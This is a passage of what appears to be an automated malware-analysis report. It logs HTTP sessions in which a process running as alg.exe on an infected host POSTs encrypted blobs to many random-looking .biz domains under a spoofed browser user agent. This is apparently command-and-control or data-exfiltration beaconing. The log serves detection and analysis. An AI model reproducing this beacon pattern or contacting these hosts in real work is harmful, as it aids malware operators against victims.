Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port
26 | 192.168.2.10 | 50005 | 54.244.188.177 | 80

Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:17.714605093 CET | 357 | OUT | POST /lqbpdlmeudihjsyy HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: cvgrf.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:17.714628935 CET | 834 | OUT | Data Raw: 01 ca d1 89 2c 50 68 86 36 03 00 00 28 a8 7a d7 64 3d 83 80 18 75 c4 23 a3 46 66 1a ac 96 c4 db dd c7 7a cb 49 b6 53 4c 9d 1e 7a a6 8b bd 34 f9 64 43 9a 58 72 3a fc b8 c7 e3 a2 7a e2 40 46 78 5d 31 41 c0 67 fd 74 b3 d0 12 a2 1a 7e e4 f6 12 e7 5d
Data Ascii: ,Ph6(zd=u#FfzISLz4dCXr:z@Fx]1Agt~]Z?zl(w>#Ygg.j{fF)3g=$u@s0~|Hc60Tefu'rGB4-UgJT1&o{c"g(b
Nov 18, 2024 09:58:18.546256065 CET  413                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4dffa1c7dba4f11012806d0ce3cd5bb9|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.cvgrf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
27          192.168.2.10  50006        44.221.84.105   80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:17.855055094 CET  351                OUT        POST /qaejwi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: saytjshyf.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:17.855091095 CET778OUTData Raw: ae ac 8c ce 13 15 d2 c1 fe 02 00 00 17 b8 1d 95 e5 a8 61 1e bd 96 1d 47 e7 a9 fd e4 34 ab 0e 8d 7d 14 29 26 27 0c 8c fc 7f 95 01 66 60 c8 30 3c c8 c6 cd ec 73 93 1a a2 7a 30 57 8b 8d 50 cc e8 8d 91 04 94 80 b6 7e e1 8b 23 a0 a0 2e 43 5a 3f 57 e4
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: aG4})&'f`0<sz0WP~#.CZ?Wl|j5g"Qjq>>.\[LUQ9-`5;E P2;g*)?/=Yo%%-w|*_o>(M]j))0s&YD
Nov 18, 2024 09:58:18.516431093 CET  417                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:18 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=4c734c81a67e1c2e6c8b3d21317e3392|155.94.241.187|1731920298|1731920298|0|1|0; path=/; domain=.saytjshyf.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port
28          192.168.2.10  50007        44.221.84.105   80
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:18.568231106 CET  350                OUT        POST /xsynoi HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: npukfztj.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.568249941 CET834OUTData Raw: fa b7 44 3a b2 ac 4c b5 36 03 00 00 7a 08 da b0 f0 49 67 8a 79 54 c4 9a 90 39 2f 17 8d 6d ce 13 23 25 3d 1b c5 3c f6 34 fe d1 1c 76 48 77 0b 98 c2 0c 8a 56 74 38 da ec 6e d2 00 d1 33 0f aa 93 36 c8 fc 61 bb a5 9a d5 80 cd c9 fa 00 91 f9 8b d3 94
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: D:L6zIgyT9/m#%=<4vHwVt8n36a@9~YGD$\3jMi]y^X{gbt,UG.}=,YO`\=W*l~Y>0M|z}Qb5vpZ#a|G:s}
Nov 18, 2024 09:58:19.228943110 CET  416                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:19 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=df57fefee3c1f779e42b678f70ad8797|155.94.241.187|1731920299|1731920299|0|1|0; path=/; domain=.npukfztj.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID  Source IP     Source Port  Destination IP  Destination Port  PID   Process
29          192.168.2.10  50008        18.141.10.107   80                7888  C:\Windows\System32\alg.exe
Timestamp                            Bytes transferred  Direction  Data
Nov 18, 2024 09:58:18.891002893 CET  356                OUT        POST /kxeknkvhxjifd HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: vcddkls.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:18.891002893 CET778OUTData Raw: 6c 02 6f c9 49 d4 fd 51 fe 02 00 00 b9 a8 30 66 60 10 61 1a cc 0d 57 1e 51 75 89 e8 09 d6 12 56 f5 28 b3 42 8d 22 fd f9 32 bd 83 30 09 13 84 07 5d 68 7b 20 51 64 e8 31 64 23 d3 49 5b d4 36 61 96 05 b7 d4 df 4d e6 6f b9 e8 2a fc 00 1c 1d 56 18 37
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: loIQ0f`aWQuV(B"20]h{ Qd1d#I[6aMo*V7Q%;> =Z/,1)0|KdJX!u`i*&\9E;an5pXt"5x7b1RP*g;x0jGt[MGo;!S[Gg,~<gVp$d~
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.349637985 CET415INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:20 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=21798887c7c6cac43eb57f2f98a1df36|155.94.241.187|1731920300|1731920300|0|1|0; path=/; domain=.vcddkls.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID    Source IP       Source Port    Destination IP     Destination Port
30            192.168.2.10    50009          172.234.222.143    80

Timestamp    Bytes transferred    Direction    Data
Nov 18, 2024 09:58:19.248648882 CET    356    OUT    POST /jrbjefwrwpdia HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:19.248648882 CET    834    OUT    Data Raw: 8c 49 b7 6d 74 57 7b 9d 36 03 00 00 99 d8 cc 1a 23 e5 e8 47 bb d0 2e e0 c6 5e 7f 6f c1 f0 39 bc 65 d4 66 82 c6 03 c7 0a c6 5e 60 66 9c fa 6f 99 1b df 8c 82 18 e3 76 bf d6 fa 5d d6 c2 75 ed 91 de bb 47 4e bb f3 5a 04 08 df a1 64 f8 66 d8 e0 c2 d4
Data Ascii: ImtW{6#G.^o9ef^`fov]uGNZdfx;\R1<EQe6{AF])~&`2!_~4~.HOG#VIzB?TsGcG'\<Ux>{MRI N$ ;q(%o5!13I>u


Session ID    Source IP       Source Port    Destination IP     Destination Port
31            192.168.2.10    50010          172.234.222.143    80

Timestamp    Bytes transferred    Direction    Data
Nov 18, 2024 09:58:19.947443962 CET    359    OUT    POST /odbjxuabwhunfmmt HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: przvgke.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:19.947443962 CET    834    OUT    Data Raw: 4f a4 e5 96 95 16 08 ff 36 03 00 00 21 93 c6 88 c3 f7 b3 d3 d5 84 03 2f db 6a 3f a6 1b 16 2e 5c 54 b9 8d 40 6d b0 53 6f 95 ac 4f a1 b3 63 b0 60 30 aa f0 00 aa 80 89 e7 06 c8 34 3c f9 50 52 a7 7c 48 37 6c 7f 31 58 1c 50 34 cb ad 80 14 6b 7f 52 ec
Data Ascii: O6!/j?.\T@mSoOc`04<PR|H7l1XP4kRNjmC@k 2zG0E{YXnA'D%`#iKN*9DA>k1/ +7~C\!^V.MO 5:ZE,]{\B^+bF


Session ID    Source IP       Source Port    Destination IP     Destination Port    PID     Process
32            192.168.2.10    50011          172.234.222.143    80                  7888    C:\Windows\System32\alg.exe

Timestamp    Bytes transferred    Direction    Data
Nov 18, 2024 09:58:20.626451015 CET    355    OUT    POST /slpstmitttatqv HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:20.626451015 CET    778    OUT    Data Raw: 8a ab 49 23 69 4a fb 9a fe 02 00 00 33 81 0b 71 de c0 b3 de f4 de 12 97 7b 6c 88 fb 0e 90 06 dc 40 a3 80 55 00 14 8f 4c 4d a3 c2 7d a5 7a 59 5e 63 8c 68 49 35 61 d8 72 ab ce 05 21 b8 7f 32 d9 a5 37 50 c1 41 b7 70 90 83 5e 88 04 0d 5f e1 db ad 12
Data Ascii: I#iJ3q{l@ULM}zY^chI5ar!27PAp^_>aMvs>)[Z"|2PrIrwYq["[!!_7G~smju;,k0WfPPd{.;&xeCg?A$(yMrS-+H[}xRX(2WrK,


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                                                                                        33192.168.2.105001218.141.10.10780
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET352OUTPOST /kwwcclrc HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: knjghuig.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 834
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:20.642258883 CET834OUTData Raw: 47 c5 96 b3 5f 41 1e 6d 36 03 00 00 7d 71 d6 51 91 c8 dc 83 93 96 8a 62 b5 02 df 71 d4 3a 2b f4 95 cb 66 26 2a d9 73 7f 23 a0 aa c3 e9 7e 52 b3 cb 4a 2a 7f 67 05 58 a9 f5 b4 32 eb 06 4c 9e cd 78 eb 56 37 53 06 32 31 1a f0 bb 3c 23 f9 12 32 38 c2
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: G_Am6}qQbq:+f&*s#~RJ*gX2LxV7S21<#28{y>G6co5aN>~+jZDtR(7Pi:tSEHHPdVJyoj.D!8*e@x*U_=x&\ukEl*G%
Nov 18, 2024 09:58:22.099942923 CET | 416 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:21 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=5605b0ffa416d2e351b978bf2736a52a|155.94.241.187|1731920301|1731920301|0|1|0; path=/; domain=.knjghuig.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
34 | 192.168.2.10 | 50013 | 172.234.222.143 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:21.427056074 CET | 354 | OUT | POST /mndfsbyfnglsm HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: fwiwk.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:21.427088022 CET | 778 | OUT | Data Raw: cc 1b 54 ea 5b 9d 84 7b fe 02 00 00 56 6b 6f 2e 21 8d 99 93 51 7e fa 52 b9 ae 8f 7a 05 e2 1e 1d 08 38 94 10 02 be f4 fd 35 7e 2b 04 b4 b0 14 91 15 4a c1 89 7a 48 6b 3f f0 5f b5 a1 47 b3 d8 66 db cb b9 59 27 a3 63 ab a0 dc 0b b1 97 64 e5 90 90 65


Session ID | Source IP | Source Port | Destination IP | Destination Port
35 | 192.168.2.10 | 50014 | 82.112.184.197 | 80
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:22.164906979 CET | 357 | OUT | POST /ynekytqvwifwsqd HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: lpuegx.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 834
Nov 18, 2024 09:58:22.164906979 CET | 834 | OUT | Data Raw: cf 48 b4 99 5c f0 08 f3 36 03 00 00 78 2d c0 32 52 5e 47 7e f2 01 e1 43 63 c1 b9 76 7d 42 04 04 ad 7c a0 e8 1f bb 0c 7e c9 b6 0b 02 a9 8e fa aa 00 55 99 7b 4d 11 f9 df cc 3e 66 f9 78 b2 39 49 90 07 33 c7 b2 2a 4b 0a 12 5a cb d0 f5 48 58 42 65 19


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.10 | 50015 | 34.246.200.160 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:22.422775030 CET | 353 | OUT | POST /xkorvlthchk HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: tbjrpv.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:22.422915936 CET | 778 | OUT | Data Raw: bf dc fa 31 08 7b e6 4b fe 02 00 00 06 22 b6 d6 9c 89 c7 b8 40 65 d7 2c ec cf 20 d4 cd d3 cd e9 bd b1 e4 bb bc ef 05 90 a0 db 9e 5f b4 70 6d 99 dc 50 8c 4d aa f8 40 41 58 48 a6 84 9b d2 ff 0a 08 1d 02 2e f6 8a 38 c9 75 ba 04 65 0b d1 ce 30 f7 ee
Nov 18, 2024 09:58:23.393579960 CET | 414 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Mon, 18 Nov 2024 08:58:23 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: close
Set-Cookie: btst=41604b3f481b1c043e65e9f296a39ade|155.94.241.187|1731920303|1731920303|0|1|0; path=/; domain=.tbjrpv.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.10 | 50016 | 18.208.156.248 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:23.537419081 CET | 353 | OUT | POST /eaufcaidikag HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: deoci.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:23.537493944 CET | 778 | OUT | Data Raw: 64 78 00 0c 31 59 ca a5 fe 02 00 00 94 83 c2 cd 48 af 87 df 71 09 55 af 7f 48 fc 59 c5 26 d1 96 d5 a8 65 af 9f d5 67 20 16 65 5a 73 99 ac 5e 51 93 d5 05 dc e5 e4 4a ef 88 a7 ba 73 a9 0c 3d 35 bb c5 5b 45 b7 24 03 78 07 c8 03 cb 0a ea d7 63 50 4c
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: dx1YHqUHY&eg eZs^QJs=5[E$xcPLyAW]"O{>\0m 88p.ei'3l(bCTR0sU(6]i8Kg~8d=E>4P>R1Ugk39VZ{.;1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:24.188848972 CET413INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                                                                                                                                                                                                        Date: Mon, 18 Nov 2024 08:58:24 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: btst=a3440eadbf4eec4b6ec743161929e5c9|155.94.241.187|1731920304|1731920304|0|1|0; path=/; domain=.deoci.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                                                                                                                                                                                                                                                                                                                                                                                                                        Set-Cookie: snkz=155.94.241.187; path=/; Expires=Thu, 15 Apr 2027 00:00:00 GMT
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.10 | 50017 | 208.100.26.245 | 80 | 7888 | C:\Windows\System32\alg.exe
Timestamp | Bytes transferred | Direction | Data
Nov 18, 2024 09:58:24.360749006 CET | 347 | OUT | POST /xev HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:24.360749960 CET | 778 | OUT | Data Raw: 0b 7a 48 bd 2b 2d 3a 0c fe 02 00 00 3a 70 a7 1c 7b 1d 00 7e e7 37 55 c7 df cf 5f 27 c7 5d 00 20 c7 44 b4 e4 b8 c9 c9 9d 60 db bb e6 0c 68 70 d2 37 5e 1d 2d e9 0b af 41 32 b9 3d 7b 87 6b 0a 7c 61 50 c4 31 43 20 98 5b c1 3f 15 d4 b7 1e 42 c3 4a 3d
Data Ascii: zH+-::p{~7U_'] D`hp7^-A2={k|aP1C [?BJ=Em<7?^@D4HP60$RFtA\{RE}0oe~tfgxmV'R.V?1?rZ 3|Ov0M-E2f1A=C&Ef1s
Nov 18, 2024 09:58:25.347691059 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:58:25 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->
Nov 18, 2024 09:58:25.561934948 CET | 360 | OUT | POST /bhaolncilxcwwbrc HTTP/1.1
Cache-Control: no-cache
Connection: Keep-Alive
Pragma: no-cache
Host: gytujflc.biz
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
Content-Length: 778
Nov 18, 2024 09:58:25.561934948 CET | 778 | OUT | Data Raw: af fe 4c 63 0c 77 71 7f fe 02 00 00 3f a8 d9 9c f6 10 d5 d6 fa e8 fd b3 72 6e 5c 4d 61 dc d6 08 89 01 22 1e 98 94 f1 37 a9 32 a7 ee 17 68 2b 98 68 b6 f4 81 66 87 58 89 1f 05 82 c8 ff 67 bd c9 bc 88 7c 46 d7 22 4c 70 92 1f cc 4f d9 e6 13 41 07 18
Data Ascii: Lcwq?rn\Ma"72h+hfXg|F"LpOA&3fnx8rGTRnyf!6.4Z-'}V$8-XZCj\c`6c &9=0EfY3aCY#x+ZzyO"Q!y
Nov 18, 2024 09:58:25.706814051 CET | 744 | IN | HTTP/1.1 404 Not Found
Server: nginx/1.14.0 (Ubuntu)
Date: Mon, 18 Nov 2024 08:58:25 GMT
Content-Type: text/html
Content-Length: 580
Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                                                                                                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                                                                                        39192.168.2.105001813.251.16.150807888C:\Windows\System32\alg.exe
                                                                                                                                                                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET358OUTPOST /xgntpyqjfcaulras HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                                                                                        Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                                                                                        Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                                                                                        Host: qaynky.biz
                                                                                                                                                                                                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 MicroMessenger/6.5.2.501 NetType/WIFI WindowsWechat QBCore/3.43.884.400 QQBrowser/9.0.2524.400
                                                                                                                                                                                                                                                                                                                                                                                                                                        Content-Length: 778
                                                                                                                                                                                                                                                                                                                                                                                                                                        Nov 18, 2024 09:58:25.962547064 CET778OUTData Raw: 40 53 f9 15 88 0d 53 ae fe 02 00 00 45 e9 7d 70 b7 5f 2b 56 c8 ea 4e a5 6e eb 49 36 cf 71 b8 79 be 65 4f f7 47 c4 9c cd 1e 9e 24 54 71 e4 91 bf e9 82 ac cd e5 90 7e d1 83 26 6d 6e ce 5d ff 96 3d f0 eb b8 df db 91 d7 b5 75 1c 74 fa 5e 01 ea 57 fa
